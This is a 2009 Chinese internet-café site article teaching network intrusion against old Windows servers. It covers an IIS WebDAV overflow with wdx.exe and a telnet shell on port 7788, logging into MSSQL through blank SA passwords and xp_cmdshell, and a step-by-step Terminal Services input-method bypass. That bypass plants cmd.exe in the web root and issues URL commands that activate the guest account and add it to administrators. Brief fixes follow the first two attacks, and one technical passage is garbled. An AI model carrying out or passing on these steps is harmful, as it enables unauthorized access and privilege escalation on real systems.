天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

教你利用个人主机进行网络入侵法

2009-8-31网页教学网佚名

  80:曾经的神话“WEBDAV”(使用情况,成功溢出4台主机,并登陆其中一台,其他3台的 IIS重启)

  微软的IIS功能强大,但遗憾的是同样漏洞多多,如果IIS不打补丁到SP3的话,那么就有一 个著名的WEBDAV漏洞。

  Webdav漏洞说明:

  Microsoft Windows 2000 支持“万维网分布式创作和版本控制 (WebDAV)”协议。RFC 2518 中定义的 WebDAV 是超文本传输协议 (HTTP) 的一组扩展,为 Internet 上计算aIIS 服务 (默认情况下在 LocalSystem 上下文中运行)的安全上下文中运行。 尽管 Microsoft 已 为此弱点提供了修补程序并建议客户立即安装该修补程序,但还是提供了其他的工具和预防 措施,客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利 用。

  可以使用扫描器:Webdavscan(是一个专门用于检测IIS 5.0 服务器是否提供了对WebDAV的 支持的扫描器)来查找网络中存在WEBDAV漏洞的主机,并用溢出程序:wdx.exe来进行攻击 当溢出成功后,就可以使用telnet或者是nc等连接到目标主机的7788端口。

  如:telnet 127.0.0.1 7788

  如果正常的话,将出现以下提示:

  Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:WINNTsystem32>

  OK!

  如何防御:

  1. 搜索注册表中的如下键:

  HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParameters

  增加如下注册表键值:

  value name: DisableWebDAV

  Data type: DWORD

  value data: 1

  2. 使用MS提供的专用补丁!

  1433:Microsoft SQL的SA空口令(扫描到4台,成功登陆其中3台)

  微软的MSSQL7.0以下的版本在默认安装时其SA(System Administrator)口令为空,所开端口 为1433,这个漏洞很早了,但直到现在我们依然可以扫描到很多空口令的SA。更为“搞笑” 的是,微软为了能够让SQL管理员管理方便,还设计了一个xp_cmdshell来执行各种相关命令 。一个入侵者只需要使用一个MS SQL客户端与SA口令为空的服务器连接就可以获得System的 权限,并可以在目标主机上执行任意命令。

  攻击方式,利用“流光”或其他扫描工具可以扫描、破解SA口令,破解成功后可以使用SQL 客户端(如SQLEXEC)连接,并获得系统权限。

  解决办法:

  更改SA管理用户口令;

  删除XP_CMDSHELL命令。(但并不保险,因为如果拥有SA权限,还是可能恢复该命令的)

  3389:3389输入法漏洞(不太可能存在了,但可以猜解管理员用户口令)

  Microsoft Windows 2000 Server及以上版本在安装服务器时,其中有一项是超级终端服务 ,该服务可以使用户通过图形界面象管理本地计算机一样控制远程计算机(因此成为众多攻 击者的最爱)。该服务所开放的端口号为3389,是微软为了方便用户远程管理而设。但是中 文Windows 2000存在有输入漏洞,其漏洞就是用户在登录Windows 2000时,利用输入法的帮 助文件可以获得Administrators组权限。

  1、用终端客户端程序进行连接;

  2、按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰, 就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;

  3、在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.( 如果不能确定NT系统目录,则输入:c:\ 或d:\ ……进行查找确定);

  4、选择"保存到磁盘" 选择目录:c:\inetpub\s\,因实际上是对方服务器上文件自身 的复制操作,所以这个过程很快就会完成;

  5、打开IE,输入:http://ip/s/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就 完成了第一步;

  6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat

  7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat

  8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add

  guest>>go.bat

  9、http://ip/s/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:

  net user guest /active:yes

  net user guest elise

  net localgroup administrators /add guest

  10、在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\s\go.bat --->在磁 盘当前位置执行;

  11、OK,.这样我们就激活了服务器的geust帐户,密码为:elise,超级用户!

本文来源:网页教学网 作者:佚名

声明
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。文章是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。 Email:support@txwb.com,系统开号,技术支持,服务联系微信:_WX_1_本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行